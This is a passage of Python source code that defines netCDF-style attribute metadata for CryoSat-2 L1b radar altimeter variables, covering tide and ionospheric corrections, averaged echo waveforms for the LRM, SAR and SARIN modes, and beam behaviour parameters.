L1b_corr_attributes['Iono_model']['long_name'] = 'Ionospheric Correction'
L1b_corr_attributes['Iono_model']['description'] = ('Altimeter range '
'correction for the delay of the radar pulse caused by free electrons '
'in the ionosphere. Computed from a simple ionospheric model.')
L1b_corr_attributes['Iono_model']['units'] = 'millimeters'
L1b_corr_attributes['Iono_model']['hertz'] = 1
#-- Ocean tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['ocTideElv'] = {}
L1b_corr_attributes['ocTideElv']['long_name'] = 'Elastic Ocean Tide'
L1b_corr_attributes['ocTideElv']['description'] = ('Removes the effect of '
'local tide and adjusts the measurement to the mean sea surface')
L1b_corr_attributes['ocTideElv']['units'] = 'millimeters'
L1b_corr_attributes['ocTideElv']['_FillValue'] = 32767
L1b_corr_attributes['ocTideElv']['hertz'] = 1
#-- Long period equilibrium ocean tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['lpeTideElv'] = {}
L1b_corr_attributes['lpeTideElv']['long_name'] = ('Long-Period Equilibrium '
'Ocean Tide')
L1b_corr_attributes['lpeTideElv']['description'] = ('Removes the effect of '
'the oceanic response to the single tidal forcing.')
L1b_corr_attributes['lpeTideElv']['units'] = 'millimeters'
L1b_corr_attributes['lpeTideElv']['_FillValue'] = 32767
L1b_corr_attributes['lpeTideElv']['hertz'] = 1
#-- Ocean loading tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['olTideElv'] = {}
L1b_corr_attributes['olTideElv']['long_name'] = 'Ocean Loading Tide'
L1b_corr_attributes['olTideElv']['description'] = ('Removes the effect of '
'local tidal distortion of the Earth crust')
L1b_corr_attributes['olTideElv']['units'] = 'millimeters'
L1b_corr_attributes['olTideElv']['hertz'] = 1
#-- Solid Earth tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['seTideElv'] = {}
L1b_corr_attributes['seTideElv']['long_name'] = 'Solid Earth Tide'
L1b_corr_attributes['seTideElv']['description'] = ('Removes the effect of '
'local tidal distortion in the Earth crust')
L1b_corr_attributes['seTideElv']['units'] = 'millimeters'
L1b_corr_attributes['seTideElv']['hertz'] = 1
#-- Geocentric Polar tide Correction packed units (mm, 1e-3 m)
L1b_corr_attributes['gpTideElv'] = {}
L1b_corr_attributes['gpTideElv']['long_name'] = 'Geocentric Polar Tide'
L1b_corr_attributes['gpTideElv']['description'] = ('Removes a long-period '
'distortion of the Earth crust caused by variations in the centrifugal '
'force as the Earth rotational axis moves its geographic location')
L1b_corr_attributes['gpTideElv']['units'] = 'millimeters'
L1b_corr_attributes['gpTideElv']['hertz'] = 1
#-- Surface Type: enumerated key to classify surface at nadir
#-- 0 = Open Ocean
#-- 1 = Closed Sea
#-- 2 = Continental Ice
#-- 3 = Land
L1b_corr_attributes['Surf_type'] = {}
L1b_corr_attributes['Surf_type']['long_name'] = 'Surface Type Flag'
L1b_corr_attributes['Surf_type']['description'] = ('Enumerated key to '
'classify surface at nadir provided by a model: (0=Open Ocean, '
'1=Closed Sea, 2=Continental Ice, 3=Land, 4-7=currently unused)')
L1b_corr_attributes['Surf_type']['hertz'] = 1
#-- Corrections Status Flag
L1b_corr_attributes['Corr_status'] = {}
L1b_corr_attributes['Corr_status']['long_name'] = 'Corrections Status Flag'
L1b_corr_attributes['Corr_status']['description'] = ('Shows correction '
'algorithms called in processing. See table 2.3.3-5 of the "L1b '
'Products Format Specification" document')
L1b_corr_attributes['Corr_status']['hertz'] = 1
#-- Correction Error Flag
L1b_corr_attributes['Corr_error'] = {}
L1b_corr_attributes['Corr_error']['long_name'] = 'Correction Error Flag'
L1b_corr_attributes['Corr_error']['description'] = ('Shows if a correction '
'algorithm returned an error when called. See table 2.3.3-6 of the '
'"L1b Products Format Specification" document')
L1b_corr_attributes['Corr_error']['hertz'] = 1
#-- CryoSat-2 Average Waveforms Groups
#-- Low-Resolution Mode (LRM)
L1b_1Hz_LRM_wfm_attributes = {}
#-- Data Record Time (MDSR Time Stamp)
L1b_1Hz_LRM_wfm_attributes['Day'] = {}
L1b_1Hz_LRM_wfm_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_1Hz_LRM_wfm_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_1Hz_LRM_wfm_attributes['Day']['description'] = ('Corresponding to '
'the middle of group of pulses')
L1b_1Hz_LRM_wfm_attributes['Day']['hertz'] = 1
#-- Time: second part
L1b_1Hz_LRM_wfm_attributes['Second'] = {}
L1b_1Hz_LRM_wfm_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_1Hz_LRM_wfm_attributes['Second']['units'] = 'seconds'
L1b_1Hz_LRM_wfm_attributes['Second']['description'] = ('Corresponding to '
'the middle of group of pulses')
L1b_1Hz_LRM_wfm_attributes['Second']['hertz'] = 1
#-- Time: microsecond part
L1b_1Hz_LRM_wfm_attributes['Micsec'] = {}
L1b_1Hz_LRM_wfm_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_1Hz_LRM_wfm_attributes['Micsec']['units'] = 'microseconds'
L1b_1Hz_LRM_wfm_attributes['Micsec']['description'] = ('Corresponding '
'to the middle of group of pulses')
L1b_1Hz_LRM_wfm_attributes['Micsec']['hertz'] = 1
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_LRM_wfm_attributes['Lat'] = {}
L1b_1Hz_LRM_wfm_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_1Hz_LRM_wfm_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_LRM_wfm_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_1Hz_LRM_wfm_attributes['Lat']['valid_min'] = -9e8
L1b_1Hz_LRM_wfm_attributes['Lat']['valid_max'] = 9e8
L1b_1Hz_LRM_wfm_attributes['Lat']['hertz'] = 1
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_LRM_wfm_attributes['Lon'] = {}
L1b_1Hz_LRM_wfm_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_1Hz_LRM_wfm_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_LRM_wfm_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_1Hz_LRM_wfm_attributes['Lon']['valid_min'] = -18e8
L1b_1Hz_LRM_wfm_attributes['Lon']['valid_max'] = 18e8
L1b_1Hz_LRM_wfm_attributes['Lon']['hertz'] = 1
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_1Hz_LRM_wfm_attributes['Alt'] = {}
L1b_1Hz_LRM_wfm_attributes['Alt']['long_name'] = 'Altitude'
L1b_1Hz_LRM_wfm_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_1Hz_LRM_wfm_attributes['Alt']['units'] = 'millimeters'
L1b_1Hz_LRM_wfm_attributes['Alt']['hertz'] = 1
#-- Window Delay (two-way) corrected for instrument delays
L1b_1Hz_LRM_wfm_attributes['TD'] = {}
L1b_1Hz_LRM_wfm_attributes['TD']['long_name'] = 'Altitude'
L1b_1Hz_LRM_wfm_attributes['TD']['description'] = ('Window Delay '
'(two-way) from the telemetry corrected for instrument delays')
L1b_1Hz_LRM_wfm_attributes['TD']['units'] = 'picoseconds'
L1b_1Hz_LRM_wfm_attributes['TD']['hertz'] = 1
#-- 1 Hz Averaged Power Echo Waveform
L1b_1Hz_LRM_wfm_attributes['Waveform'] = {}
L1b_1Hz_LRM_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_1Hz_LRM_wfm_attributes['Waveform']['description'] = ('Array of 128 bins. '
'Averaged from all individual L0 echoes in approx 1 second (20 for LRM). '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B')
L1b_1Hz_LRM_wfm_attributes['Waveform']['valid_min'] = 0
L1b_1Hz_LRM_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_1Hz_LRM_wfm_attributes['Waveform']['hertz'] = 1
#-- Echo Scale Factor (to scale echo to watts)
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 1
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 1
#-- Number of echoes averaged
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes'] = {}
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of'
'echoes averaged')
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes']['description'] = ('Normally '
'1820 for LRM (= 91 averaged on-board *20))')
L1b_1Hz_LRM_wfm_attributes['N_avg_echoes']['hertz'] = 1
#-- Flags
L1b_1Hz_LRM_wfm_attributes['Flags'] = {}
L1b_1Hz_LRM_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_1Hz_LRM_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-3a of the "L1b Products '
'Format Specification" document')
L1b_1Hz_LRM_wfm_attributes['Flags']['flag_meanings'] = \
'1_hz_echo_error_not_computed mispointing_bad_angles'
L1b_1Hz_LRM_wfm_attributes['Flags']['hertz'] = 1
#-- SAR Mode
L1b_1Hz_SAR_wfm_attributes = {}
#-- Data Record Time (MDSR Time Stamp)
L1b_1Hz_SAR_wfm_attributes['Day'] = {}
L1b_1Hz_SAR_wfm_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_1Hz_SAR_wfm_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_1Hz_SAR_wfm_attributes['Day']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SAR_wfm_attributes['Day']['hertz'] = 1
#-- Time: second part
L1b_1Hz_SAR_wfm_attributes['Second'] = {}
L1b_1Hz_SAR_wfm_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_1Hz_SAR_wfm_attributes['Second']['units'] = 'seconds'
L1b_1Hz_SAR_wfm_attributes['Second']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SAR_wfm_attributes['Second']['hertz'] = 1
#-- Time: microsecond part
L1b_1Hz_SAR_wfm_attributes['Micsec'] = {}
L1b_1Hz_SAR_wfm_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_1Hz_SAR_wfm_attributes['Micsec']['units'] = 'microseconds'
L1b_1Hz_SAR_wfm_attributes['Micsec']['description'] = ('Corresponding '
'ground bounce time of the individual pulse')
L1b_1Hz_SAR_wfm_attributes['Micsec']['hertz'] = 1
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SAR_wfm_attributes['Lat'] = {}
L1b_1Hz_SAR_wfm_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_1Hz_SAR_wfm_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SAR_wfm_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_1Hz_SAR_wfm_attributes['Lat']['valid_min'] = -9e8
L1b_1Hz_SAR_wfm_attributes['Lat']['valid_max'] = 9e8
L1b_1Hz_SAR_wfm_attributes['Lat']['hertz'] = 1
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SAR_wfm_attributes['Lon'] = {}
L1b_1Hz_SAR_wfm_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_1Hz_SAR_wfm_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SAR_wfm_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_1Hz_SAR_wfm_attributes['Lon']['valid_min'] = -18e8
L1b_1Hz_SAR_wfm_attributes['Lon']['valid_max'] = 18e8
L1b_1Hz_SAR_wfm_attributes['Lon']['hertz'] = 1
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_1Hz_SAR_wfm_attributes['Alt'] = {}
L1b_1Hz_SAR_wfm_attributes['Alt']['long_name'] = 'Altitude'
L1b_1Hz_SAR_wfm_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_1Hz_SAR_wfm_attributes['Alt']['units'] = 'millimeters'
L1b_1Hz_SAR_wfm_attributes['Alt']['hertz'] = 1
#-- Window Delay (two-way) corrected for instrument delays
L1b_1Hz_SAR_wfm_attributes['TD'] = {}
L1b_1Hz_SAR_wfm_attributes['TD']['long_name'] = 'Altitude'
L1b_1Hz_SAR_wfm_attributes['TD']['description'] = ('Window Delay '
'(two-way) from the telemetry corrected for instrument delays')
L1b_1Hz_SAR_wfm_attributes['TD']['units'] = 'picoseconds'
L1b_1Hz_SAR_wfm_attributes['TD']['hertz'] = 1
#-- 1 Hz Averaged Power Echo Waveform
L1b_1Hz_SAR_wfm_attributes['Waveform'] = {}
L1b_1Hz_SAR_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_1Hz_SAR_wfm_attributes['Waveform']['description'] = ('Array of 128 bins. '
'Averaged from all individual L0 echoes in approx 1 second (5120 for SAR). '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B. The last 1Hz average waveform of the product '
'is meaningless in most of the cases because there are not enough FBR '
'samples to be used in the averaging operation. When this happens the '
'waveform is flagged as invalid')
L1b_1Hz_SAR_wfm_attributes['Waveform']['valid_min'] = 0
L1b_1Hz_SAR_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_1Hz_SAR_wfm_attributes['Waveform']['hertz'] = 1
#-- Echo Scale Factor (to scale echo to watts)
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 1
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 1
#-- Number of echoes averaged
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes'] = {}
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of'
'echoes averaged')
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes']['description'] = ('Normally 5120'
' for SAR. May be lower if individual echoes are missing or rejected')
L1b_1Hz_SAR_wfm_attributes['N_avg_echoes']['hertz'] = 1
#-- Flags
L1b_1Hz_SAR_wfm_attributes['Flags'] = {}
L1b_1Hz_SAR_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_1Hz_SAR_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-3b of the "L1b Products '
'Format Specification" document')
L1b_1Hz_SAR_wfm_attributes['Flags']['flag_meanings'] = \
'1_hz_echo_error_not_computed mispointing_bad_angles'
L1b_1Hz_SAR_wfm_attributes['Flags']['hertz'] = 1
#-- SARIN Mode
#-- Same as the LRM/SAR groups but the waveform array is 512 bins instead of
#-- 128 and the number of echoes averaged is different.
L1b_1Hz_SARIN_wfm_attributes = {}
#-- Data Record Time (MDSR Time Stamp)
L1b_1Hz_SARIN_wfm_attributes['Day'] = {}
L1b_1Hz_SARIN_wfm_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_1Hz_SARIN_wfm_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_1Hz_SARIN_wfm_attributes['Day']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SARIN_wfm_attributes['Day']['hertz'] = 1
#-- Time: second part
L1b_1Hz_SARIN_wfm_attributes['Second'] = {}
L1b_1Hz_SARIN_wfm_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_1Hz_SARIN_wfm_attributes['Second']['units'] = 'seconds'
L1b_1Hz_SARIN_wfm_attributes['Second']['description'] = ('Corresponding to '
'ground bounce time of the individual pulse')
L1b_1Hz_SARIN_wfm_attributes['Second']['hertz'] = 1
#-- Time: microsecond part
L1b_1Hz_SARIN_wfm_attributes['Micsec'] = {}
L1b_1Hz_SARIN_wfm_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_1Hz_SARIN_wfm_attributes['Micsec']['units'] = 'microseconds'
L1b_1Hz_SARIN_wfm_attributes['Micsec']['description'] = ('Corresponding '
'ground bounce time of the individual pulse')
L1b_1Hz_SARIN_wfm_attributes['Micsec']['hertz'] = 1
#-- Lat: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SARIN_wfm_attributes['Lat'] = {}
L1b_1Hz_SARIN_wfm_attributes['Lat']['long_name'] = 'Latitude of measurement'
L1b_1Hz_SARIN_wfm_attributes['Lat']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SARIN_wfm_attributes['Lat']['units'] = '0.1 micro-degree'
L1b_1Hz_SARIN_wfm_attributes['Lat']['valid_min'] = -9e8
L1b_1Hz_SARIN_wfm_attributes['Lat']['valid_max'] = 9e8
L1b_1Hz_SARIN_wfm_attributes['Lat']['hertz'] = 1
#-- Lon: packed units (0.1 micro-degree, 1e-7 degrees)
L1b_1Hz_SARIN_wfm_attributes['Lon'] = {}
L1b_1Hz_SARIN_wfm_attributes['Lon']['long_name'] = 'Longitude of measurement'
L1b_1Hz_SARIN_wfm_attributes['Lon']['description'] = ('Corresponding to the '
'position at the MDSR Time Stamp')
L1b_1Hz_SARIN_wfm_attributes['Lon']['units'] = '0.1 micro-degree'
L1b_1Hz_SARIN_wfm_attributes['Lon']['valid_min'] = -18e8
L1b_1Hz_SARIN_wfm_attributes['Lon']['valid_max'] = 18e8
L1b_1Hz_SARIN_wfm_attributes['Lon']['hertz'] = 1
#-- Alt: packed units (mm, 1e-3 m)
#-- Altitude of COG above reference ellipsoid
L1b_1Hz_SARIN_wfm_attributes['Alt'] = {}
L1b_1Hz_SARIN_wfm_attributes['Alt']['long_name'] = 'Altitude'
L1b_1Hz_SARIN_wfm_attributes['Alt']['description'] = ('Altitude of Satellite '
'COG above reference ellipsoid corresponding to the MDSR Time Stamp')
L1b_1Hz_SARIN_wfm_attributes['Alt']['units'] = 'millimeters'
L1b_1Hz_SARIN_wfm_attributes['Alt']['hertz'] = 1
#-- Window Delay (two-way) corrected for instrument delays
L1b_1Hz_SARIN_wfm_attributes['TD'] = {}
L1b_1Hz_SARIN_wfm_attributes['TD']['long_name'] = 'Altitude'
L1b_1Hz_SARIN_wfm_attributes['TD']['description'] = ('Window Delay '
'(two-way) from the telemetry corrected for instrument delays')
L1b_1Hz_SARIN_wfm_attributes['TD']['units'] = 'picoseconds'
L1b_1Hz_SARIN_wfm_attributes['TD']['hertz'] = 1
#-- 1 Hz Averaged Power Echo Waveform
L1b_1Hz_SARIN_wfm_attributes['Waveform'] = {}
L1b_1Hz_SARIN_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_1Hz_SARIN_wfm_attributes['Waveform']['description'] = ('Array of 512 bins. '
'Averaged from all individual 1280 L0 echoes in SARin mode. '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B. The last 1Hz average waveform of the product '
'is meaningless in most of the cases because there are not enough FBR '
'samples to be used in the averaging operation. When this happens the '
'waveform is flagged as invalid')
L1b_1Hz_SARIN_wfm_attributes['Waveform']['valid_min'] = 0
L1b_1Hz_SARIN_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_1Hz_SARIN_wfm_attributes['Waveform']['hertz'] = 1
#-- Echo Scale Factor (to scale echo to watts)
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 1
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_1Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 1
#-- Number of echoes averaged
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes'] = {}
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of'
'echoes averaged')
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes']['description'] = ('Normally 1280'
' for SARIN. May be lower if individual echoes are missing or rejected')
L1b_1Hz_SARIN_wfm_attributes['N_avg_echoes']['hertz'] = 1
#-- Flags
L1b_1Hz_SARIN_wfm_attributes['Flags'] = {}
L1b_1Hz_SARIN_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_1Hz_SARIN_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-3b of the "L1b Products '
'Format Specification" document')
L1b_1Hz_SARIN_wfm_attributes['Flags']['flag_meanings'] = \
'1_hz_echo_error_not_computed mispointing_bad_angles'
L1b_1Hz_SARIN_wfm_attributes['Flags']['hertz'] = 1
#-- CryoSat-2 Waveforms Groups
#-- Beam Behavior Parameters
L1b_BB_attributes = {}
#-- Standard Deviation of Gaussian fit to range integrated stack power.
L1b_BB_attributes['SD'] = {}
L1b_BB_attributes['SD']['long_name'] = 'Standard Deviation'
L1b_BB_attributes['SD']['description'] = ('Standard Deviation of Gaussian '
'fit to range integrated stack power')
L1b_BB_attributes['SD']['units'] = '1/100'
L1b_BB_attributes['SD']['hertz'] = 20
#-- Stack Center: Mean of Gaussian fit to range integrated stack power.
L1b_BB_attributes['Center'] = {}
L1b_BB_attributes['Center']['long_name'] = 'Stack Center'
L1b_BB_attributes['Center']['description'] = ('Mean of Gaussian fit to '
'range integrated stack power')
L1b_BB_attributes['Center']['units'] = '1/100'
L1b_BB_attributes['Center']['hertz'] = 20
#-- Stack amplitude parameter scaled in dB/100.
L1b_BB_attributes['Amplitude'] = {}
L1b_BB_attributes['Amplitude']['long_name'] = 'Stack amplitude'
L1b_BB_attributes['Amplitude']['description'] = 'Amplitude Parameter'
L1b_BB_attributes['Amplitude']['units'] = 'dB/100'
L1b_BB_attributes['Amplitude']['hertz'] = 20
#-- 3rd moment: providing the degree of asymmetry of the range integrated
#-- stack power distribution.
L1b_BB_attributes['Skewness'] = {}
L1b_BB_attributes['Skewness']['long_name'] = 'Stack Skewness'
L1b_BB_attributes['Skewness']['description'] = ('3rd moment: providing the '
'degree of asymmetry of the range integrated stack power distribution')
L1b_BB_attributes['Skewness']['units'] = '1/100'
L1b_BB_attributes['Skewness']['_FillValue'] = -99900
L1b_BB_attributes['Skewness']['hertz'] = 20
#-- 4th moment: Measure of peakiness of range integrated stack power distribution.
L1b_BB_attributes['Kurtosis'] = {}
L1b_BB_attributes['Kurtosis']['long_name'] = 'Stack Kurtosis'
L1b_BB_attributes['Kurtosis']['description'] = ('4th moment: measure of '
'peakiness of range integrated stack power distribution')
L1b_BB_attributes['Kurtosis']['units'] = '1/100'
L1b_BB_attributes['Kurtosis']['_FillValue'] = -99900
L1b_BB_attributes['Kurtosis']['hertz'] = 20
#-- Stack peakiness computed from the range integrated power of the single look echoes
L1b_BB_attributes['Peakiness'] = {}
L1b_BB_attributes['Peakiness']['long_name'] = 'Stack Peakiness'
L1b_BB_attributes['Peakiness']['description'] = ('Stack peakiness computed '
'from the range integrated power of the single look echoes within a '
'stack. Stack peakiness is defined as the inverse of the average of '
'the range integrated power normalized for the power at zero look angle')
L1b_BB_attributes['Peakiness']['units'] = '1/100'
L1b_BB_attributes['Peakiness']['_FillValue'] = -99900
L1b_BB_attributes['Peakiness']['hertz'] = 20
#-- Stack residuals of Gaussian that fits the range integrated power of the single look echoes
L1b_BB_attributes['RMS'] = {}
L1b_BB_attributes['RMS']['long_name'] = 'Gaussian Power Fit Residuals'
L1b_BB_attributes['RMS']['description'] = ('Residuals of Gaussian that '
'fits the range integrated power of the single look echoes within a '
'stack. It is the root mean squared error between the Gaussian fitting '
'and the range integrated power of the single look echoes within a stack')
L1b_BB_attributes['RMS']['units'] = 'dbW'
L1b_BB_attributes['RMS']['_FillValue'] = -99900
L1b_BB_attributes['RMS']['hertz'] = 20
#-- Standard deviation as a function of boresight angle (microradians)
L1b_BB_attributes['SD_boresight_angle'] = {}
L1b_BB_attributes['SD_boresight_angle']['long_name'] = 'Standard Deviation'
L1b_BB_attributes['SD_boresight_angle']['description'] = ('Standard '
'deviation as a function of boresight angle')
L1b_BB_attributes['SD_boresight_angle']['units'] = 'microradians'
L1b_BB_attributes['SD_boresight_angle']['valid_min'] = 0
L1b_BB_attributes['SD_boresight_angle']['valid_max'] = 65525
L1b_BB_attributes['SD_boresight_angle']['hertz'] = 20
#-- Stack Center angle as a function of boresight angle (microradians)
L1b_BB_attributes['Center_boresight_angle'] = {}
L1b_BB_attributes['Center_boresight_angle']['long_name'] = 'Stack Centre Angle'
L1b_BB_attributes['Center_boresight_angle']['description'] = ('Stack Centre '
'angle as a function of boresight angle')
L1b_BB_attributes['Center_boresight_angle']['units'] = 'microradians'
L1b_BB_attributes['Center_boresight_angle']['valid_min'] = -32768
L1b_BB_attributes['Center_boresight_angle']['valid_max'] = 32768
L1b_BB_attributes['Center_boresight_angle']['hertz'] = 20
#-- Stack Center angle as a function of look angle (microradians)
L1b_BB_attributes['Center_look_angle'] = {}
L1b_BB_attributes['Center_look_angle']['long_name'] = 'Stack Centre Angle'
L1b_BB_attributes['Center_look_angle']['description'] = ('Stack Centre '
'angle as a function of look angle')
L1b_BB_attributes['Center_look_angle']['units'] = 'microradians'
L1b_BB_attributes['Center_look_angle']['valid_min'] = -32768
L1b_BB_attributes['Center_look_angle']['valid_max'] = 32768
L1b_BB_attributes['Center_look_angle']['hertz'] = 20
#-- Number of contributing beams in the stack before weighting
L1b_BB_attributes['Number'] = {}
L1b_BB_attributes['Number']['long_name'] = ('Number of contributing '
'beams before weighting')
L1b_BB_attributes['Number']['description'] = ('Number of contributing '
'beams in the stack before weighting: number of single look echoes '
'in the stack before the Surface Sample Stack weighting is applied')
L1b_BB_attributes['Number']['units'] = 'count'
L1b_BB_attributes['Number']['hertz'] = 20
#-- Number of contributing beams in the stack after weighting
L1b_BB_attributes['Weighted_Number'] = {}
L1b_BB_attributes['Weighted_Number']['long_name'] = ('Number of contributing '
'beams after weighting')
L1b_BB_attributes['Weighted_Number']['description'] = ('Number of contributing '
'beams in the stack after weighting: number of single look echoes '
'in the stack after the Surface Sample Stack weighting is applied')
L1b_BB_attributes['Weighted_Number']['units'] = 'count'
L1b_BB_attributes['Weighted_Number']['hertz'] = 20
#-- Low-Resolution Mode
L1b_20Hz_LRM_wfm_attributes = {}
#-- Averaged Power Echo Waveform
L1b_20Hz_LRM_wfm_attributes['Waveform'] = {}
L1b_20Hz_LRM_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_20Hz_LRM_wfm_attributes['Waveform']['description'] = ('Array of 128 bins. '
'Averaged (on-board) from 91 individual in pulse limited mode (LRM). '
'Converted to Watts by using the scaling parameters. Power in Watts = '
'counts*(A*1e-9)*2^B')
L1b_20Hz_LRM_wfm_attributes['Waveform']['valid_min'] = 0
L1b_20Hz_LRM_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_20Hz_LRM_wfm_attributes['Waveform']['hertz'] = 20
#-- Echo Scale Factor (to scale echo to watts)
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_LRM_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 20
